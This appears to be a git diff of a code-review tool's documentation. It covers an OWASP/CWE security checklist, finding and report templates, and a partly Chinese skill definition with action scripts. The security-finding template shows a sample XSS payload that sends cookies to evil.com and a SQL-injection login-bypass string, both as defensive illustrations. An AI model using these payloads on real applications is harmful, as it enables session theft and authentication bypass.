**Finding Schema**:
```json
{
"id": "string",
"type": "string",
"category": "security|code_quality|performance|maintainability",
"severity": "critical|high|medium|low",
"file": "string",
"line": "number",
"column": "number",
"code": "string",
"message": "string",
"recommendation": {
"description": "string",
"fix_example": "string"
},
"references": ["string"],
"cwe": "string (optional)",
"owasp": "string (optional)"
}
```
## Validation Requirements
### Phase Completion Criteria
**Phase 1 (Code Discovery)**:
- ✅ At least 1 file discovered
- ✅ Files categorized by priority
- ✅ Metadata extracted
- ✅ Inventory JSON created
**Phase 2 (Security Analysis)**:
- ✅ All critical/high priority files analyzed
- ✅ Findings have severity classification
- ✅ CWE/OWASP mappings included
- ✅ Fix recommendations provided
**Phase 3 (Best Practices)**:
- ✅ Code quality checks completed
- ✅ Performance analysis done
- ✅ Maintainability assessed
- ✅ Recommendations provided
**Phase 4 (Report Generation)**:
- ✅ All findings consolidated
- ✅ Scores calculated
- ✅ Reports generated
- ✅ Checklist created
## Skill Execution Standards
### Performance Targets
- **Phase 1**: < 30 seconds per 1000 files
- **Phase 2**: < 60 seconds per 100 files (security)
- **Phase 3**: < 60 seconds per 100 files (best practices)
- **Phase 4**: < 10 seconds (report generation)
### Resource Limits
- **Memory**: < 2GB for projects with 1000+ files
- **CPU**: Efficient pattern matching (minimize regex complexity)
- **Disk**: Use streaming for large files (> 10MB)
### Error Handling
**Graceful Degradation**:
- If tool unavailable: Skip check, note in report
- If file unreadable: Log warning, continue with others
- If analysis fails: Report error, continue with next file
**User Notification**:
- Progress updates every 10% completion
- Clear error messages with troubleshooting steps
- Final summary with metrics and file locations
## Integration Standards
### Git Integration
**Pre-commit Hook**:
```bash
#!/bin/bash
ccw run code-reviewer --scope staged --severity critical,high
exit $? # Block commit if critical/high issues found
```
**PR Comments**:
- Automatic review comments on changed lines
- Summary comment with overall findings
- Status check (pass/fail based on threshold)
### CI/CD Integration
**Requirements**:
- Exit code 0 if no critical/high issues
- Exit code 1 if blocking issues found
- JSON output for parsing
- Configurable severity threshold
### IDE Integration
**LSP Support** (future):
- Real-time security/quality feedback
- Inline fix suggestions
- Quick actions for common fixes
## Compliance Mapping
### Supported Standards
**PCI DSS**:
- Requirement 6.5: Common coding vulnerabilities
- Map findings to specific requirements
**HIPAA**:
- Technical safeguards
- Map data exposure findings
**GDPR**:
- Data protection by design
- Map sensitive data handling
**SOC 2**:
- Security controls
- Map access control findings
### Compliance Reports
Generate compliance-specific reports:
```
.code-review/compliance/
├── pci-dss-report.md
├── hipaa-report.md
├── gdpr-report.md
└── soc2-report.md
```

View File

@@ -1,243 +0,0 @@
# Security Requirements Specification
## OWASP Top 10 Coverage
### A01:2021 - Broken Access Control
**Checks**:
- Missing authorization checks on protected routes
- Insecure direct object references (IDOR)
- Path traversal vulnerabilities
- Missing CSRF protection
- Elevation of privilege
**Patterns**:
```javascript
// Missing auth middleware
router.get('/admin/*', handler); // ❌ No auth check
// Insecure direct object reference
router.get('/user/:id', async (req, res) => {
const user = await User.findById(req.params.id); // ❌ No ownership check
res.json(user);
});
```
### A02:2021 - Cryptographic Failures
**Checks**:
- Sensitive data transmitted without encryption
- Weak cryptographic algorithms (MD5, SHA1)
- Hardcoded secrets/keys
- Insecure random number generation
**Patterns**:
```javascript
// Weak hashing
const hash = crypto.createHash('md5').update(password); // ❌ MD5 is weak
// Hardcoded secret
const token = jwt.sign(payload, 'secret123'); // ❌ Hardcoded secret
```
### A03:2021 - Injection
**Checks**:
- SQL injection
- NoSQL injection
- Command injection
- LDAP injection
- XPath injection
**Patterns**:
```javascript
// SQL injection
const query = `SELECT * FROM users WHERE id = ${userId}`; // ❌
// Command injection
exec(`git clone ${userRepo}`); // ❌
```
### A04:2021 - Insecure Design
**Checks**:
- Missing rate limiting
- Lack of input validation
- Business logic flaws
- Missing security requirements
### A05:2021 - Security Misconfiguration
**Checks**:
- Default credentials
- Overly permissive CORS
- Verbose error messages
- Unnecessary features enabled
- Missing security headers
**Patterns**:
```javascript
// Overly permissive CORS
app.use(cors({ origin: '*' })); // ❌
// Verbose error
res.status(500).json({ error: err.stack }); // ❌
```
### A06:2021 - Vulnerable and Outdated Components
**Checks**:
- Dependencies with known vulnerabilities
- Unmaintained dependencies
- Using deprecated APIs
### A07:2021 - Identification and Authentication Failures
**Checks**:
- Weak password requirements
- Permits brute force attacks
- Exposed session IDs
- Weak JWT implementation
**Patterns**:
```javascript
// Weak bcrypt rounds
bcrypt.hash(password, 4); // ❌ Too low (min: 10)
// Session ID in URL
res.redirect(`/dashboard?sessionId=${sessionId}`); // ❌
```
### A08:2021 - Software and Data Integrity Failures
**Checks**:
- Insecure deserialization
- Unsigned/unverified updates
- CI/CD pipeline vulnerabilities
**Patterns**:
```javascript
// Insecure deserialization
const obj = eval(userInput); // ❌
// Pickle vulnerability (Python)
data = pickle.loads(untrusted_data) #
```
### A09:2021 - Security Logging and Monitoring Failures
**Checks**:
- Missing audit logs
- Sensitive data in logs
- Insufficient monitoring
**Patterns**:
```javascript
// Password in logs
console.log(`Login attempt: ${username}:${password}`); // ❌
```
### A10:2021 - Server-Side Request Forgery (SSRF)
**Checks**:
- Unvalidated URLs in requests
- Internal network access
- Cloud metadata exposure
**Patterns**:
```javascript
// SSRF vulnerability
const response = await fetch(userProvidedUrl); // ❌
```
## CWE Top 25 Coverage
### CWE-79: Cross-site Scripting (XSS)
**Patterns**:
```javascript
element.innerHTML = userInput; // ❌
document.write(userInput); // ❌
```
### CWE-89: SQL Injection
**Patterns**:
```javascript
query = `SELECT * FROM users WHERE name = '${name}'`; // ❌
```
### CWE-20: Improper Input Validation
**Checks**:
- Missing input sanitization
- No input length limits
- Unvalidated file uploads
### CWE-78: OS Command Injection
**Patterns**:
```javascript
exec(`ping ${userInput}`); // ❌
```
### CWE-190: Integer Overflow
**Checks**:
- Large number operations without bounds checking
- Array allocation with user-controlled size
## Language-Specific Security Rules
### TypeScript/JavaScript
- Prototype pollution
- eval() usage
- Unsafe regex (ReDoS)
- require() with dynamic input
### Python
- pickle vulnerabilities
- yaml.unsafe_load()
- SQL injection in SQLAlchemy
- Command injection in subprocess
### Java
- Deserialization vulnerabilities
- XXE in XML parsers
- Path traversal
- SQL injection in JDBC
### Go
- Race conditions
- SQL injection
- Path traversal
- Weak cryptography
## Severity Classification
### Critical
- Remote code execution
- SQL injection with write access
- Authentication bypass
- Hardcoded credentials in production
### High
- XSS in sensitive contexts
- Missing authorization checks
- Sensitive data exposure
- Insecure cryptography
### Medium
- Missing rate limiting
- Weak password policy
- Security misconfiguration
- Information disclosure
### Low
- Missing security headers
- Verbose error messages
- Outdated dependencies (no known exploits)

View File

@@ -1,234 +0,0 @@
# Best Practice Finding Template
Use this template for documenting code quality, performance, and maintainability issues.
## Finding Structure
```json
{
"id": "BP-{number}",
"type": "{issue-type}",
"category": "{code_quality|performance|maintainability}",
"severity": "{high|medium|low}",
"file": "{file-path}",
"line": {line-number},
"function": "{function-name}",
"message": "{clear-description}",
"recommendation": {
"description": "{how-to-fix}",
"example": "{corrected-code}"
}
}
```
## Markdown Template
```markdown
### 🟠 [BP-{number}] {Issue Title}
**File**: `{file-path}:{line}`
**Category**: {Code Quality|Performance|Maintainability}
**Issue**: {Detailed explanation of the problem}
**Current Code**:
\`\`\`{language}
{problematic-code}
\`\`\`
**Recommended Fix**:
\`\`\`{language}
{improved-code-with-comments}
\`\`\`
**Impact**: {Why this matters - readability, performance, maintainability}
---
```
## Example: High Complexity
```markdown
### 🟠 [BP-001] High Cyclomatic Complexity
**File**: `src/utils/validator.ts:78`
**Category**: Code Quality
**Function**: `validateUserInput`
**Complexity**: 15 (threshold: 10)
**Issue**: Function has 15 decision points, making it difficult to test and maintain.
**Current Code**:
\`\`\`typescript
function validateUserInput(input) {
if (!input) return false;
if (!input.email) return false;
if (!input.email.includes('@')) return false;
if (input.email.length > 255) return false;
// ... 11 more conditions
}
\`\`\`
**Recommended Fix**:
\`\`\`typescript
// Extract validation rules
const validationRules = {
email: (email) => email && email.includes('@') && email.length <= 255,
password: (pwd) => pwd && pwd.length >= 8 && /[A-Z]/.test(pwd),
username: (name) => name && /^[a-zA-Z0-9_]+$/.test(name),
};
// Simplified validator
function validateUserInput(input) {
return Object.entries(validationRules).every(([field, validate]) =>
validate(input[field])
);
}
\`\`\`
**Impact**: Reduces complexity from 15 to 3, improves testability, and makes validation rules reusable.
---
```
## Example: N+1 Query
```markdown
### 🟠 [BP-002] N+1 Query Pattern
**File**: `src/api/orders.ts:45`
**Category**: Performance
**Issue**: Database query executed inside loop, causing N+1 queries problem. For 100 orders, this creates 101 database queries instead of 2.
**Current Code**:
\`\`\`typescript
const orders = await Order.findAll();
for (const order of orders) {
const user = await User.findById(order.userId);
order.userName = user.name;
}
\`\`\`
**Recommended Fix**:
\`\`\`typescript
// Batch query all users at once
const orders = await Order.findAll();
const userIds = orders.map(o => o.userId);
const users = await User.findByIds(userIds);
// Create lookup map for O(1) access
const userMap = new Map(users.map(u => [u.id, u]));
// Enrich orders with user data
for (const order of orders) {
order.userName = userMap.get(order.userId)?.name;
}
\`\`\`
**Impact**: Reduces database queries from O(n) to O(1), significantly improving performance for large datasets.
---
```
## Example: Missing Documentation
```markdown
### 🟡 [BP-003] Missing Documentation
**File**: `src/services/PaymentService.ts:23`
**Category**: Maintainability
**Issue**: Exported class lacks documentation, making it difficult for other developers to understand its purpose and usage.
**Current Code**:
\`\`\`typescript
export class PaymentService {
async processPayment(orderId: string, amount: number) {
// implementation
}
}
\`\`\`
**Recommended Fix**:
\`\`\`typescript
/**
* Service for processing payment transactions
*
* Handles payment processing, refunds, and transaction logging.
* Integrates with Stripe payment gateway.
*
* @example
* const paymentService = new PaymentService();
* const result = await paymentService.processPayment('order-123', 99.99);
*/
export class PaymentService {
/**
* Process a payment for an order
*
* @param orderId - Unique order identifier
* @param amount - Payment amount in USD
* @returns Payment confirmation with transaction ID
* @throws {PaymentError} If payment processing fails
*/
async processPayment(orderId: string, amount: number) {
// implementation
}
}
\`\`\`
**Impact**: Improves code discoverability and reduces onboarding time for new developers.
---
```
## Example: Memory Leak
```markdown
### 🟠 [BP-004] Potential Memory Leak
**File**: `src/components/Chat.tsx:56`
**Category**: Performance
**Issue**: WebSocket event listener added without cleanup, causing memory leaks when component unmounts.
**Current Code**:
\`\`\`tsx
useEffect(() => {
socket.on('message', handleMessage);
}, []);
\`\`\`
**Recommended Fix**:
\`\`\`tsx
useEffect(() => {
socket.on('message', handleMessage);
// Cleanup on unmount
return () => {
socket.off('message', handleMessage);
};
}, []);
\`\`\`
**Impact**: Prevents memory leaks and improves application stability in long-running sessions.
---
```
## Severity Guidelines
### High
- Major performance impact (N+1 queries, O(n²) algorithms)
- Critical maintainability issues (complexity > 15)
- Missing error handling in critical paths
### Medium
- Moderate performance impact
- Code quality issues (complexity 11-15, duplication)
- Missing tests for important features
### Low
- Minor style violations
- Missing documentation
- Low-impact dead code

View File

@@ -1,316 +0,0 @@
# Report Template
## Main Report Structure (REPORT.md)
```markdown
# Code Review Report
**Generated**: {timestamp}
**Scope**: {scope}
**Files Reviewed**: {total_files}
**Total Findings**: {total_findings}
---
## 📊 Executive Summary
### Overall Assessment
{Brief 2-3 paragraph assessment of code health}
### Risk Level: {LOW|MEDIUM|HIGH|CRITICAL}
{Risk assessment based on findings severity and count}
### Key Statistics
| Metric | Value | Status |
|--------|-------|--------|
| Total Files | {count} | - |
| Files with Issues | {count} | {percentage}% |
| Critical Findings | {count} | {icon} |
| High Findings | {count} | {icon} |
| Medium Findings | {count} | {icon} |
| Low Findings | {count} | {icon} |
### Category Breakdown
| Category | Count | Percentage |
|----------|-------|------------|
| Security | {count} | {percentage}% |
| Code Quality | {count} | {percentage}% |
| Performance | {count} | {percentage}% |
| Maintainability | {count} | {percentage}% |
---
## 🎯 Quality Scores
### Security Score: {score}/100
{Assessment and key issues}
### Code Quality Score: {score}/100
{Assessment and key issues}
### Performance Score: {score}/100
{Assessment and key issues}
### Maintainability Score: {score}/100
{Assessment and key issues}
### Overall Score: {score}/100
**Grade**: {A|B|C|D|F}
---
## 🔴 Critical Findings (Requires Immediate Action)
{List all critical findings using security-finding.md template}
---
## 🟠 High Priority Findings
{List all high findings}
---
## 🟡 Medium Priority Findings
{List all medium findings}
---
## 🟢 Low Priority Findings
{List all low findings}
---
## 📋 Action Plan
### Immediate (Within 24 hours)
1. {Critical issue 1}
2. {Critical issue 2}
3. {Critical issue 3}
### Short-term (Within 1 week)
1. {High priority issue 1}
2. {High priority issue 2}
...
### Medium-term (Within 1 month)
1. {Medium priority issue 1}
2. {Medium priority issue 2}
...
### Long-term (Within 3 months)
1. {Low priority issue 1}
2. {Improvement initiative 1}
...
---
## 📊 Metrics Dashboard
### Code Health Trends
{If historical data available, show trends}
### File Hotspots
Top files with most issues:
1. `{file-path}` - {count} issues ({severity breakdown})
2. `{file-path}` - {count} issues
...
### Technology Breakdown
Issues by language/framework:
- TypeScript: {count} issues
- Python: {count} issues
...
---
## ✅ Compliance Status
### PCI DSS
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
- **Affecting Findings**: {list}
### HIPAA
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
- **Affecting Findings**: {list}
### GDPR
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
- **Affecting Findings**: {list}
---
## 📚 Appendix
### A. Review Configuration
\`\`\`json
{review-config}
\`\`\`
### B. Tools and Versions
- Code Reviewer Skill: v1.0.0
- Security Rules: OWASP Top 10 2021, CWE Top 25
- Languages Analyzed: {list}
### C. References
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Top 25](https://cwe.mitre.org/top25/)
- {additional references}
### D. Full Findings Index
{Links to detailed finding JSONs}
```
---
## Fix Checklist Template (FIX-CHECKLIST.md)
```markdown
# Code Review Fix Checklist
**Generated**: {timestamp}
**Total Items**: {count}
---
## 🔴 Critical Issues (Fix Immediately)
- [ ] **[SEC-001]** SQL Injection in `src/auth/user-service.ts:145`
- Effort: 1 hour
- Priority: P0
- Assignee: ___________
- [ ] **[SEC-002]** Hardcoded JWT Secret in `src/auth/jwt.ts:23`
- Effort: 30 minutes
- Priority: P0
- Assignee: ___________
---
## 🟠 High Priority Issues (Fix This Week)
- [ ] **[SEC-003]** Missing Authorization in `src/api/admin.ts:34`
- Effort: 2 hours
- Priority: P1
- Assignee: ___________
- [ ] **[BP-001]** N+1 Query in `src/api/orders.ts:45`
- Effort: 1 hour
- Priority: P1
- Assignee: ___________
---
## 🟡 Medium Priority Issues (Fix This Month)
{List medium priority items}
---
## 🟢 Low Priority Issues (Fix Next Release)
{List low priority items}
---
## Progress Tracking
**Overall Progress**: {completed}/{total} ({percentage}%)
- Critical: {completed}/{total}
- High: {completed}/{total}
- Medium: {completed}/{total}
- Low: {completed}/{total}
**Estimated Total Effort**: {hours} hours
**Estimated Completion**: {date}
```
---
## Summary JSON Template (summary.json)
```json
{
"report_date": "2024-01-15T12:00:00Z",
"scope": "src/**/*",
"statistics": {
"total_files": 247,
"files_with_issues": 89,
"total_findings": 69,
"by_severity": {
"critical": 3,
"high": 13,
"medium": 30,
"low": 23
},
"by_category": {
"security": 24,
"code_quality": 18,
"performance": 12,
"maintainability": 15
}
},
"scores": {
"security": 68,
"code_quality": 75,
"performance": 82,
"maintainability": 70,
"overall": 74
},
"grade": "C",
"risk_level": "MEDIUM",
"action_required": true,
"compliance": {
"pci_dss": {
"status": "NON_COMPLIANT",
"affecting_findings": ["SEC-001", "SEC-002", "SEC-008", "SEC-011"]
},
"hipaa": {
"status": "NON_COMPLIANT",
"affecting_findings": ["SEC-005", "SEC-009"]
},
"gdpr": {
"status": "PARTIAL",
"affecting_findings": ["SEC-002", "SEC-005", "SEC-007"]
}
},
"top_issues": [
{
"id": "SEC-001",
"type": "sql-injection",
"severity": "critical",
"file": "src/auth/user-service.ts",
"line": 145
}
],
"hotspots": [
{
"file": "src/auth/user-service.ts",
"issues": 5,
"severity_breakdown": { "critical": 1, "high": 2, "medium": 2 }
}
],
"effort_estimate": {
"critical": 4.5,
"high": 18,
"medium": 35,
"low": 12,
"total_hours": 69.5
}
}
```

View File

@@ -1,161 +0,0 @@
# Security Finding Template
Use this template for documenting security vulnerabilities.
## Finding Structure
```json
{
"id": "SEC-{number}",
"type": "{vulnerability-type}",
"severity": "{critical|high|medium|low}",
"file": "{file-path}",
"line": {line-number},
"column": {column-number},
"code": "{vulnerable-code-snippet}",
"message": "{clear-description-of-issue}",
"cwe": "CWE-{number}",
"owasp": "A{number}:2021 - {category}",
"recommendation": {
"description": "{how-to-fix}",
"fix_example": "{corrected-code}"
},
"references": [
"https://...",
"https://..."
]
}
```
## Markdown Template
```markdown
### 🔴 [SEC-{number}] {Vulnerability Title}
**File**: `{file-path}:{line}`
**CWE**: CWE-{number} | **OWASP**: A{number}:2021 - {category}
**Vulnerable Code**:
\`\`\`{language}
{vulnerable-code-snippet}
\`\`\`
**Issue**: {Detailed explanation of the vulnerability and potential impact}
**Attack Example** (if applicable):
\`\`\`
{example-attack-payload}
Result: {what-happens}
Effect: {security-impact}
\`\`\`
**Recommended Fix**:
\`\`\`{language}
{corrected-code-with-comments}
\`\`\`
**References**:
- [{reference-title}]({url})
- [{reference-title}]({url})
---
```
## Severity Icon Mapping
- Critical: 🔴
- High: 🟠
- Medium: 🟡
- Low: 🟢
## Example: SQL Injection Finding
```markdown
### 🔴 [SEC-001] SQL Injection in User Authentication
**File**: `src/auth/user-service.ts:145`
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
**Vulnerable Code**:
\`\`\`typescript
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
const user = await db.execute(query);
\`\`\`
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands and bypass authentication.
**Attack Example**:
\`\`\`
username: ' OR '1'='1' --
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
Effect: Bypasses authentication, returns all users
\`\`\`
**Recommended Fix**:
\`\`\`typescript
// Use parameterized queries
const query = 'SELECT * FROM users WHERE username = ?';
const user = await db.execute(query, [username]);
// Or use ORM
const user = await User.findOne({ where: { username } });
\`\`\`
**References**:
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
---
```
## Example: XSS Finding
```markdown
### 🟠 [SEC-002] Cross-Site Scripting (XSS) in Comment Rendering
**File**: `src/components/CommentList.tsx:89`
**CWE**: CWE-79 | **OWASP**: A03:2021 - Injection
**Vulnerable Code**:
\`\`\`tsx
<div dangerouslySetInnerHTML={{ __html: comment.body }} />
\`\`\`
**Issue**: User-generated content rendered without sanitization, allowing script injection.
**Attack Example**:
\`\`\`
comment.body: "<script>fetch('evil.com/steal?cookie='+document.cookie)</script>"
Effect: Steals user session cookies
\`\`\`
**Recommended Fix**:
\`\`\`tsx
import DOMPurify from 'dompurify';
// Sanitize HTML before rendering
<div dangerouslySetInnerHTML={{
__html: DOMPurify.sanitize(comment.body)
}} />
// Or use text content (if HTML not needed)
<div>{comment.body}</div>
\`\`\`
**References**:
- [OWASP XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
- [CWE-79](https://cwe.mitre.org/data/definitions/79.html)
---
```
## Compliance Mapping Template
When finding affects compliance:
```markdown
**Compliance Impact**:
- **PCI DSS**: Requirement 6.5.1 (Injection flaws)
- **HIPAA**: Technical Safeguards - Access Control
- **GDPR**: Article 32 (Security of processing)
```

View File

@@ -0,0 +1,170 @@
---
name: review-code
description: Multi-dimensional code review with structured reports. Analyzes correctness, readability, performance, security, testing, and architecture. Triggers on "review code", "code review", "审查代码", "代码审查".
allowed-tools: Task, AskUserQuestion, Read, Write, Glob, Grep, Bash, mcp__ace-tool__search_context, mcp__ide__getDiagnostics
---
# Review Code
Multi-dimensional code review skill that analyzes code across 6 key dimensions and generates structured review reports with actionable recommendations.
## Architecture Overview
```
┌─────────────────────────────────────────────────────────────────┐
│ ⚠️ Phase 0: Specification Study (强制前置) │
│ → 阅读 specs/review-dimensions.md │
│ → 理解审查维度和问题分类标准 │
└───────────────┬─────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ Orchestrator (状态驱动决策) │
│ → 读取状态 → 选择审查动作 → 执行 → 更新状态 │
└───────────────┬─────────────────────────────────────────────────┘
┌───────────┼───────────┬───────────┬───────────┐
↓ ↓ ↓ ↓ ↓
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐
│ Collect │ │ Quick │ │ Deep │ │ Report │ │Complete │
│ Context │ │ Scan │ │ Review │ │ Generate│ │ │
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └─────────┘
↓ ↓ ↓ ↓
┌─────────────────────────────────────────────────────────────────┐
│ Review Dimensions │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
│ │Correctness│ │Readability│ │Performance│ │ Security │ │
│ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │
│ ┌──────────┐ ┌──────────┐ │
│ │ Testing │ │Architecture│ │
│ └──────────┘ └──────────┘ │
└─────────────────────────────────────────────────────────────────┘
```
## Key Design Principles
1. **多维度审查**: 覆盖正确性、可读性、性能、安全性、测试覆盖、架构一致性六大维度
2. **分层执行**: 快速扫描识别高风险区域,深入审查聚焦关键问题
3. **结构化报告**: 按严重程度分类,提供文件位置和修复建议
4. **状态驱动**: 自主模式,根据审查进度动态选择下一步动作
---
## ⚠️ Mandatory Prerequisites (强制前置条件)
> **⛔ 禁止跳过**: 在执行任何审查操作之前,**必须**完整阅读以下文档。
### 规范文档 (必读)
| Document | Purpose | Priority |
|----------|---------|----------|
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度定义和检查点 | **P0 - 最高** |
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类和严重程度标准 | **P0 - 最高** |
| [specs/quality-standards.md](specs/quality-standards.md) | 审查质量标准 | P1 |
### 模板文件 (生成前必读)
| Document | Purpose |
|----------|---------|
| [templates/review-report.md](templates/review-report.md) | 审查报告模板 |
| [templates/issue-template.md](templates/issue-template.md) | 问题记录模板 |
---
## Execution Flow
```
┌─────────────────────────────────────────────────────────────────┐
│ Phase 0: Specification Study (强制前置 - 禁止跳过) │
│ → Read: specs/review-dimensions.md │
│ → Read: specs/issue-classification.md │
│ → 理解审查标准和问题分类 │
├─────────────────────────────────────────────────────────────────┤
│ Action: collect-context │
│ → 收集目标文件/目录 │
│ → 识别技术栈和语言 │
│ → Output: state.context (files, language, framework) │
├─────────────────────────────────────────────────────────────────┤
│ Action: quick-scan │
│ → 快速扫描整体结构 │
│ → 识别高风险区域 │
│ → Output: state.risk_areas, state.scan_summary │
├─────────────────────────────────────────────────────────────────┤
│ Action: deep-review (per dimension) │
│ → 逐维度深入审查 │
│ → 记录发现的问题 │
│ → Output: state.findings[] │
├─────────────────────────────────────────────────────────────────┤
│ Action: generate-report │
│ → 汇总所有发现 │
│ → 生成结构化报告 │
│ → Output: review-report.md │
├─────────────────────────────────────────────────────────────────┤
│ Action: complete │
│ → 保存最终状态 │
│ → 输出审查摘要 │
└─────────────────────────────────────────────────────────────────┘
```
## Directory Setup
```javascript
const timestamp = new Date().toISOString().slice(0,19).replace(/[-:T]/g, '');
const workDir = `.workflow/.scratchpad/review-code-${timestamp}`;
Bash(`mkdir -p "${workDir}"`);
Bash(`mkdir -p "${workDir}/findings"`);
```
## Output Structure
```
.workflow/.scratchpad/review-code-{timestamp}/
├── state.json # 审查状态
├── context.json # 目标上下文
├── findings/ # 问题发现
│ ├── correctness.json
│ ├── readability.json
│ ├── performance.json
│ ├── security.json
│ ├── testing.json
│ └── architecture.json
└── review-report.md # 最终审查报告
```
## Review Dimensions
| Dimension | Focus Areas | Key Checks |
|-----------|-------------|------------|
| **Correctness** | 逻辑正确性 | 边界条件、错误处理、null 检查 |
| **Readability** | 代码可读性 | 命名规范、函数长度、注释质量 |
| **Performance** | 性能效率 | 算法复杂度、I/O 优化、资源使用 |
| **Security** | 安全性 | 注入风险、敏感信息、权限控制 |
| **Testing** | 测试覆盖 | 测试充分性、边界覆盖、可维护性 |
| **Architecture** | 架构一致性 | 设计模式、分层结构、依赖管理 |
## Issue Severity Levels
| Level | Prefix | Description | Action Required |
|-------|--------|-------------|-----------------|
| **Critical** | [C] | 阻塞性问题,必须立即修复 | Must fix before merge |
| **High** | [H] | 重要问题,需要修复 | Should fix |
| **Medium** | [M] | 建议改进 | Consider fixing |
| **Low** | [L] | 可选优化 | Nice to have |
| **Info** | [I] | 信息性建议 | For reference |
## Reference Documents
| Document | Purpose |
|----------|---------|
| [phases/orchestrator.md](phases/orchestrator.md) | 审查编排器 |
| [phases/state-schema.md](phases/state-schema.md) | 状态结构定义 |
| [phases/actions/action-collect-context.md](phases/actions/action-collect-context.md) | 收集上下文 |
| [phases/actions/action-quick-scan.md](phases/actions/action-quick-scan.md) | 快速扫描 |
| [phases/actions/action-deep-review.md](phases/actions/action-deep-review.md) | 深入审查 |
| [phases/actions/action-generate-report.md](phases/actions/action-generate-report.md) | 生成报告 |
| [phases/actions/action-complete.md](phases/actions/action-complete.md) | 完成审查 |
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度规范 |
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类标准 |
| [specs/quality-standards.md](specs/quality-standards.md) | 质量标准 |
| [templates/review-report.md](templates/review-report.md) | 报告模板 |
| [templates/issue-template.md](templates/issue-template.md) | 问题模板 |

View File

@@ -0,0 +1,139 @@
# Action: Collect Context
收集审查目标的上下文信息。
## Purpose
在开始审查前,收集目标代码的基本信息:
- 确定审查范围(文件/目录)
- 识别编程语言和框架
- 统计代码规模
## Preconditions
- [ ] state.status === 'pending' || state.context === null
## Execution
```javascript
async function execute(state, workDir) {
// 1. 询问用户审查目标
const input = await AskUserQuestion({
questions: [{
question: "请指定要审查的代码路径:",
header: "审查目标",
multiSelect: false,
options: [
{ label: "当前目录", description: "审查当前工作目录下的所有代码" },
{ label: "src/", description: "审查 src/ 目录" },
{ label: "手动指定", description: "输入自定义路径" }
]
}]
});
const targetPath = input["审查目标"] === "手动指定"
? input["其他"]
: input["审查目标"] === "当前目录" ? "." : "src/";
// 2. 收集文件列表
const files = Glob(`${targetPath}/**/*.{ts,tsx,js,jsx,py,java,go,rs,cpp,c,cs}`);
// 3. 检测主要语言
const languageCounts = {};
files.forEach(file => {
const ext = file.split('.').pop();
const langMap = {
'ts': 'TypeScript', 'tsx': 'TypeScript',
'js': 'JavaScript', 'jsx': 'JavaScript',
'py': 'Python',
'java': 'Java',
'go': 'Go',
'rs': 'Rust',
'cpp': 'C++', 'c': 'C',
'cs': 'C#'
};
const lang = langMap[ext] || 'Unknown';
languageCounts[lang] = (languageCounts[lang] || 0) + 1;
});
const primaryLanguage = Object.entries(languageCounts)
.sort((a, b) => b[1] - a[1])[0]?.[0] || 'Unknown';
// 4. 统计代码行数
let totalLines = 0;
for (const file of files.slice(0, 100)) { // 限制前100个文件
try {
const content = Read(file);
totalLines += content.split('\n').length;
} catch (e) {}
}
// 5. 检测框架
let framework = null;
if (files.some(f => f.includes('package.json'))) {
const pkg = JSON.parse(Read('package.json'));
if (pkg.dependencies?.react) framework = 'React';
else if (pkg.dependencies?.vue) framework = 'Vue';
else if (pkg.dependencies?.angular) framework = 'Angular';
else if (pkg.dependencies?.express) framework = 'Express';
else if (pkg.dependencies?.next) framework = 'Next.js';
}
// 6. 构建上下文
const context = {
target_path: targetPath,
files: files.slice(0, 200), // 限制最多200个文件
language: primaryLanguage,
framework: framework,
total_lines: totalLines,
file_count: files.length
};
// 7. 保存上下文
Write(`${workDir}/context.json`, JSON.stringify(context, null, 2));
return {
stateUpdates: {
status: 'running',
context: context
}
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
status: 'running',
context: {
target_path: targetPath,
files: fileList,
language: primaryLanguage,
framework: detectedFramework,
total_lines: totalLines,
file_count: fileCount
}
}
};
```
## Output
- **File**: `context.json`
- **Location**: `${workDir}/context.json`
- **Format**: JSON
## Error Handling
| Error Type | Recovery |
|------------|----------|
| 路径不存在 | 提示用户重新输入 |
| 无代码文件 | 返回错误,终止审查 |
| 读取权限问题 | 跳过该文件,记录警告 |
## Next Actions
- 成功: action-quick-scan
- 失败: action-abort

View File

@@ -0,0 +1,115 @@
# Action: Complete
完成审查,保存最终状态。
## Purpose
结束代码审查流程:
- 保存最终状态
- 输出审查摘要
- 提供报告路径
## Preconditions
- [ ] state.status === 'running'
- [ ] state.report_generated === true
## Execution
```javascript
async function execute(state, workDir) {
// 1. 计算审查时长
const duration = Date.now() - new Date(state.started_at).getTime();
const durationMinutes = Math.round(duration / 60000);
// 2. 生成最终摘要
const summary = {
...state.summary,
review_duration_ms: duration,
completed_at: new Date().toISOString()
};
// 3. 保存最终状态
const finalState = {
...state,
status: 'completed',
completed_at: summary.completed_at,
summary: summary
};
Write(`${workDir}/state.json`, JSON.stringify(finalState, null, 2));
// 4. 输出摘要信息
console.log('========================================');
console.log(' CODE REVIEW COMPLETED');
console.log('========================================');
console.log('');
console.log(`📁 审查目标: ${state.context.target_path}`);
console.log(`📄 文件数量: ${state.context.file_count}`);
console.log(`📝 代码行数: ${state.context.total_lines}`);
console.log('');
console.log('--- 问题统计 ---');
console.log(`🔴 Critical: ${summary.critical}`);
console.log(`🟠 High: ${summary.high}`);
console.log(`🟡 Medium: ${summary.medium}`);
console.log(`🔵 Low: ${summary.low}`);
console.log(`⚪ Info: ${summary.info}`);
console.log(`📊 Total: ${summary.total_issues}`);
console.log('');
console.log(`⏱️ 审查用时: ${durationMinutes} 分钟`);
